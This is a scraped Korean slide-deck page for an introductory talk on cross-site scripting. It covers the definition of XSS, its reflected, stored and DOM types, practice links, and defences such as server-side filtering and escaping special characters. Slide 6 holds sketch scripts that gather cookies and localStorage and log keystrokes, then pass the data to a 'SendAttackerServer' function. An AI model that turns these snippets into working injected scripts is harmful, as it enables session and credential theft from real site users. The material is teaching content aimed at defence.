Springcamp 2015 - xss는 네가 맡아라Springcamp 2015 - xss는 네가 맡아라
Springcamp 2015 - xss는 네가 맡아라
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
 
Web framework security
Web framework securityWeb framework security
Web framework security
 
Web framework security
Web framework securityWeb framework security
Web framework security
 
5-5. html5 connectivity
5-5. html5 connectivity5-5. html5 connectivity
5-5. html5 connectivity
 

Más de 용진 조

Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txtElasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt용진 조
 
당근마켓에서 IaC경험
당근마켓에서 IaC경험당근마켓에서 IaC경험
당근마켓에서 IaC경험용진 조
 
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰용진 조
 
서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1용진 조
 
유비쿼터스의 클라우드
유비쿼터스의 클라우드유비쿼터스의 클라우드
유비쿼터스의 클라우드용진 조
 
201133271 조용진 io t 발표
201133271 조용진 io t 발표201133271 조용진 io t 발표
201133271 조용진 io t 발표용진 조
 
개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?용진 조
 

Más de 용진 조 (7)

Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txtElasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
 
당근마켓에서 IaC경험
당근마켓에서 IaC경험당근마켓에서 IaC경험
당근마켓에서 IaC경험
 
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
 
서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1
 
유비쿼터스의 클라우드
유비쿼터스의 클라우드유비쿼터스의 클라우드
유비쿼터스의 클라우드
 
201133271 조용진 io t 발표
201133271 조용진 io t 발표201133271 조용진 io t 발표
201133271 조용진 io t 발표
 
개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?
 

XSS 에 대해서 알아보자. [실습 포함]

  • 1. XSS를.araboza 실습을 통해 배우는 Cross Site Scripting dydwls121200@gmail.com 조용진 XSS 어디에나 있지만. 어디에도 있으면 안된다.
  • 2. 1. XSS의 정의 2. XSS의 유형 3. XSS의 사례 및 실습 4. 대처방안
  • 4. 1. XSS의 정의 사이트간 스크립팅, 크로스 사이트 스크립팅 영문 명칭 Cross-Site Scripting은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹 사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입 할 수 있는 취약점. (Wikipedia : 크로스사이트 스크립팅의 정의)
  • 6. 악성스크립트? http://likemilk.fun25.co.kr:15405/ 삽입 script 1 console.log(document.cookie); console.log(document); console.log(localStorage); Var hijecking = {}; hijecking.cookie = document.cookie; hijecking.document = document; hijecking.localStorage = localStorage; //알아서 코딩.. ㅎㅎ ; SendAttackerServer(hijecking); 삽입 script 2 Var input=“”; $(document).on(‘keyup’,function(event){ input+=event.key; console.log(input); input=input.replace(‘Backspace’); //등등… }); //알아서 코딩 ㅎㅎ; $(document).on(‘click’,function(event){ SendAttackerServer(input); }); 1. XSS의 정의
  • 7. 2. XSS의 유형 XSS 유형에 대해 알아보아요-!
  • 8. Reflective XSS 공격자가 악성 스크립 트가 포함된 URL을 클 라이언트에게 노출시 켜 클릭하도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 DOM XSS 클라이언트에서 수 신받은 문서를 공격 자가 의도한 문서로 조작한다. 2. XSS의 유형
  • 10. 1. 순수한 스트리밍 x동사이트인줄 알고 클릭했더니 악성 Active X가 설치됨 2. 이상한 사이트를 접속했더니 바탕화면에 바로가기가 설 치된다거나 이상한 사이트가 즐겨찾기됨 3. 유용한 유틸리티 다운받을 수 있는 URL이라 선택했는데 다운받고 나니 악성프로그램. 4. 악성 플래쉬 소스를 이용한 웹페이지를 열람하게됨. Reflective XSS 공격자가 악성 스크립트 가 포함된 URL을 클라이 언트에게 노출시켜 클릭 하도록 한다. 2. XSS의 유형
  • 12. 1. 게시판에 악성 스크립트를 삽입한 글을 남기고 다른 사용 자가 해당 게시글을 읽었을 경우 악성 스크립트가 실행되게 된다. 2. 저장된 악성스크립트에 특정 돔객체의 event를 조작하는 스크립트를 삽입하여 악성스크립트를 실행하게 한다. 3. XmlHttpOpen,$.ajax, $.get, $.post 객체의 EventEmitter를 이용하여 공격자의 서버에도 피해자의 발생 데이터를 같이 받아볼 수 있도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 4. 서버에서 문자열 치환 작업을 역 이용해서 스크립트를 삽 입하거나, 문자열의 인코딩을 아예 변환한 악성 스크립트를 저장하도록 한다. 2. XSS의 유형
  • 14. DOM XSS 클라이언트에서 수신 받은 문서를 공격자 가 의도한 문서로 조 작 한다. 1. 클라이언트가 읽을 수 있는 파라메터 값을 타인이 만들어 서 넣을 수 있는 기능이 있을 때 발생할 수 있다. 예: (친구의 이름:(이름에다가 악성스크립트를 넣을 때) 2. 서버에서 클라이언트에게 뿌리는 값이 다른 클라이언틀 에 의해 만들어지는 모든 입출력 데이터는 XSS 필터를 거치 고 난 후에 출력 될 수 있도록 해야한다. 2. XSS의 유형
  • 15. 3. XSS의 실습 실습을 해보아요-!
  • 16. 3. XSS의 실습 https://namu.wiki/w/XSS http://egloos.zum.com/keep/v/1030642 HTML 특수문자 인코더
  • 18. 4. 대처 방안 Server-Side 에서 XSS 필터를 구현하자 외부 플러그인 및 라이브러리를 적용시킬 때 SQL Injection 및 XSS에 대한 성능을 자가진단으로 테스트해본다. 개인정보 및 운영 정보는 Client-Side에 저장 시키는것을 지양한다. [< > “ ‘ ; : ` ! @ # $ % & * | ( ) { } ] 위와 같은 문자열을 치환해서 사 용하도록 하자.